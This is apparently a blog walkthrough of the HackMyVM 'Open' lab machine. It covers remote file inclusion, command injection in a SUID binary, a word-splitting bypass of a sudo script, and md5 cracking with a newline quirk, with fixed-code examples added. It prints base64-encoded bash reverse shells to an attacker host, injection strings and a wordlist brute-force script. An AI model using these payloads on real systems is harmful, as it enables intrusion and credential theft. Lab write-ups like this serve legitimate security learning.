HackMyVM-Open

Target IP: 192.168.56.130

Information Gathering


nmap 192.168.56.130
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-03 08:23 EDT
Nmap scan report for open.dsz (192.168.56.130)
Host is up (0.00048s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:5E:25:AE (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds

Visiting port 80 redirects to the domain open.dsz; add it to /etc/hosts on the attack box (the reverse lookup in the nmap output above already shows the entry).

Getshell


The site presents a page that takes a URL parameter, which hints at RFI (remote file inclusion). Remote includes only work when PHP's allow_url_include is on, and it evidently is here.

Serve a PHP file from the attack box with a simple HTTP server (python3 -m http.server 80), point the include at http://192.168.56.104/1.php, and catch the reverse shell on a listener. The base64 in 1.php decodes to `(bash >& /dev/tcp/192.168.56.104/4444 0>&1) &`.

cat 1.php 
<?php
// Base64 decodes to: (bash >& /dev/tcp/192.168.56.104/4444 0>&1) &
// Backgrounding the shell lets the include return so the listener gets a clean session.
echo shell_exec("printf KGJhc2ggPiYgL2Rldi90Y3AvMTkyLjE2OC41Ni4xMDQvNDQ0NCAwPiYxKSAm|base64 -d|bash");
?>
┌──(root㉿kali)-[/home/kali/Desktop]
└─# ./penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444 (127.0.0.1, 192.168.21.128, 192.168.56.104, 172.17.0.1, 172.18.0.1)
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from Open-192.168.56.130-Linux-x86_64 😍 Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /root/.penelope/Open~192.168.56.130_Linux_x86_64/2025_08_03-06_46_03-181.log 📜

www-data can read the user flag directly, which is generous.

GetMiao


As usual, look around the filesystem, starting with SUID binaries.

www-data@Open:/opt$ find / -type f -perm -4000 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1
/opt/echo

/opt/echo is the only non-standard SUID binary. Looking at its strings shows it wraps the argument in a fixed shell command (echo '[user input]: <arg>'), so a single quote in the argument breaks out of the literal and anything after it runs as a command. The base64 below decodes to `(bash >& /dev/tcp/192.168.56.104/9999 0>&1) &`, a second reverse shell on port 9999.

www-data@Open:/opt$ ./echo "'; printf KGJhc2ggPiYgL2Rldi90Y3AvMTkyLjE2OC41Ni4xMDQvOTk5OSAwPiYxKSAm|base64 -d|bash; echo '"
Executing command: echo '[user input]: '; printf KGJhc2ggPiYgL2Rldi90Y3AvMTkyLjE2OC41Ni4xMDQvOTk5OSAwPiYxKSAm|base64 -d|bash; echo ''
[user input]:

───────────────────────────────────────────────────────────────────────────────
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from Open-192.168.56.130-Linux-x86_64 😍 Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /root/.penelope/Open~192.168.56.130_Linux_x86_64/2025_08_03-07_29_25-362.log 📜
────────────────────────────────────────────────────────────────────────────────────────────────────────
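To make the quote breakout concrete, here is an added example (my own code, not the /opt/echo binary from the box) that models how that program assembles its command and contrasts it with two safe ways to print untrusted input. The `[user input]` label and the harmless `echo INJECTED` stand in for the real prompt string and the base64 reverse-shell payload.

```sh
#!/bin/sh
# Added example, not the /opt/echo binary from the target: models how that
# program builds its command (echo '[user input]: <arg>' handed to a shell)
# and why a single quote in the argument becomes command execution.

# Vulnerable: the argument is spliced into a command string that sh re-parses,
# so a quote in $1 closes the literal and everything after it runs as code.
vuln_echo() {
    sh -c "echo '[user input]: $1'"
}

# Hardened: never let user data reach a shell parser. printf receives the
# value as its own argv entry, so quotes and semicolons are ordinary bytes.
safe_echo() {
    printf '[user input]: %s\n' "$1"
}

# If the value really must travel through sh -c, escape every single quote
# as '\'' and wrap the result in quotes, so the literal cannot be closed early.
quote_for_sh() {
    printf "'%s'" "$(printf '%s' "$1" | sed "s/'/'\\\\''/g")"
}
escaped_echo() {
    sh -c "echo '[user input]: '$(quote_for_sh "$1")"
}

# Same shape as the payload used against the box, with a harmless command
# in place of the base64-encoded reverse shell.
PAYLOAD="'; echo INJECTED; echo '"
echo "--- vulnerable (INJECTED runs as a command) ---"
vuln_echo "$PAYLOAD"
echo "--- printf (payload printed verbatim) ---"
safe_echo "$PAYLOAD"
echo "--- escaped (payload printed verbatim) ---"
escaped_echo "$PAYLOAD"
```

The printf form is the one to reach for: the fix is not better escaping but keeping the shell out of the path entirely. The escaping variant is shown only because some programs cannot avoid `sh -c`, and it illustrates how much care a single quote needs.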

Then drop an SSH public key into miao's ~/.ssh/authorized_keys so the box can be reached over SSH instead of the reverse shell.

Root


miao@Open:~$ sudo -l
Matching Defaults entries for miao on Open:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User miao may run the following commands on Open:
(ALL) NOPASSWD: /opt/hello.sh
miao@Open:~$ sudo /opt/hello.sh dsz
miao@Open:~$ cat /opt/hello.sh
PATH=/usr/bin

[ -n "$1" ] || exit 1
[ "$1" = "dsz" ] && exit 2
#[ $1 = "dsz" ] && cat /root/password.txt | md5sum | awk '{print $1}'
[ $1 = "dsz" ] && cat /root/password.txt

echo "Goodbye!"

There is an injection point here too. The first check quotes "$1" and rejects an exact "dsz", but the last check leaves $1 unquoted, so the argument is word-split and its pieces become part of the [ expression itself.

sudo /opt/hello.sh "x -o dsz"
6cd1f22e65d26246530ff7a2528144e3
Goodbye!

"x -o dsz" passes because the unquoted test expands to [ x -o dsz = dsz ], which is true (non-empty string OR dsz = dsz). An even simpler bypass is a trailing space: "dsz " is not equal to "dsz" in the quoted comparison, so exit 2 is skipped, but word splitting in the unquoted test turns it into [ dsz = dsz ].

I spent a long time failing to crack the md5. Looking back at the script, the hash is computed from the output of cat, and the file ends with a newline, so what was hashed is the password followed by "\n" (echo -n would have suppressed the newline; cat cannot). Wordlist tools hash the bare word by default, which is why nothing matched.
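Both points above, the unquoted-test bypass and the trailing newline in the hash, are easy to misjudge from reading alone, so here is an added example (my own script, not the box's /opt/hello.sh) with a stand-in secret in place of /root/password.txt and a four-word constructed wordlist in place of rockyou.txt. It leaks the hash the same way the sudo script does, shows that the newline-free hash would never match, and cracks the leaked one correctly.

```sh
#!/bin/sh
# Added example, not the target's /opt/hello.sh: a stand-in for the sudo
# script with the same unquoted test, plus the cracking step that has to
# account for the newline that cat feeds into md5sum.

SECRET='letmein'   # stand-in for the line stored in /root/password.txt (assumption)

# Mirrors hello.sh. The first test is quoted and rejects an exact "dsz";
# the second is unquoted, so $1 is word-split and becomes part of the
# test expression. On success it leaks md5(secret + "\n"), exactly what
# `cat /root/password.txt | md5sum` produces when the file ends in a newline.
vuln_gate() {
    [ -n "$1" ] || return 1
    [ "$1" = "dsz" ] && return 2
    # shellcheck disable=SC2086   # deliberately unquoted, as in the target
    [ $1 = "dsz" ] 2>/dev/null && { printf '%s\n' "$SECRET" | md5sum | awk '{print $1}'; return 0; }
    return 1
}

# Fixed: quoting $1 makes the second test a plain string comparison, so no
# argument can both slip past the first test and satisfy the second.
fixed_gate() {
    [ -n "$1" ] || return 1
    [ "$1" = "dsz" ] && return 2
    [ "$1" = "dsz" ] && { printf '%s\n' "$SECRET" | md5sum | awk '{print $1}'; return 0; }
    return 1
}

# Hash a candidate the way the script did (with trailing newline) and the way
# cracking tools do by default (without), so the two can be compared.
md5_with_nl()    { printf '%s\n' "$1" | md5sum | awk '{print $1}'; }
md5_without_nl() { printf '%s'   "$1" | md5sum | awk '{print $1}'; }

# Constructed wordlist standing in for rockyou.txt. Prints the word whose
# md5(word + "\n") equals the target hash; returns 1 if none does.
crack_with_nl() {
    target="$1"
    for w in password 123456 letmein qwerty; do
        if [ "$(md5_with_nl "$w")" = "$target" ]; then
            printf '%s\n' "$w"
            return 0
        fi
    done
    return 1
}

leaked="$(vuln_gate 'x -o dsz')"
echo "leaked via 'x -o dsz':   $leaked"
echo "leaked via 'dsz ':       $(vuln_gate 'dsz ')"
echo "exact 'dsz' leaks:       '$(vuln_gate 'dsz')'   (empty, exit 2)"
echo "fixed gate leaks:        '$(fixed_gate 'x -o dsz')'   (empty)"
echo "md5 without newline:     $(md5_without_nl "$SECRET")   (what a default crack attempt compares against)"
echo "cracked with newline:    $(crack_with_nl "$leaked")"
```

The practical check is the last two lines: if a leaked hash will not crack, hash the top of the wordlist both with and without a trailing newline before assuming the password is not in the list.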

Brute-force it with a Python script that appends the newline before hashing.

import hashlib

# Configuration
DICTIONARY_PATH = 'rockyou.txt'
TARGET_HASH = '6cd1f22e65d26246530ff7a2528144e3'


def check_password(word_bytes):
    """Return the plaintext if md5(word + b'\\n') matches TARGET_HASH, else None."""
    # Strip only the wordlist's own line ending, then append the single newline
    # that cat fed into md5sum. Leading/trailing spaces may be part of the
    # password, so a bare .strip() would silently skip such entries.
    candidate = word_bytes.rstrip(b'\r\n') + b'\n'
    if hashlib.md5(candidate).hexdigest() == TARGET_HASH:
        return candidate.decode(errors="ignore").rstrip('\n')
    return None


def main():
    print("[*] Starting brute force...")
    try:
        # MD5 is cheap and CPU-bound, and Python threads share one interpreter
        # lock, so a single pass over the file is simpler and faster than
        # spawning a thread per word.
        with open(DICTIONARY_PATH, 'rb') as file:
            for word in file:
                plaintext = check_password(word)
                if plaintext is not None:
                    print(f"\n[+] Match found! Plaintext: {plaintext}\n")
                    return
    except FileNotFoundError:
        print(f"[-] Cannot open dictionary file: {DICTIONARY_PATH}")
        return

    print("\n[-] No match found")


if __name__ == "__main__":
    main()

Log in as root with the recovered password.

ssh root@192.168.56.130
root@192.168.56.130's password:
Linux Open 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jul 29 00:48:55 2025 from 192.168.3.94
root@Open:~# cat /root/root.txt
flag{root-6cd1f22e65d26246530ff7a2528144e3}
root@Open:~#

A fairly standard box overall. The path from webshell to user to root builds up step by step, the focus is mostly on command injection, and the details matter: an unquoted variable and a trailing newline are the whole difference between a stuck crack and a root shell.


HackMyVM-Open
http://example.com/2025/08/03/HackMyVM-Open/
Author: Skyarrow
Posted on: August 3, 2025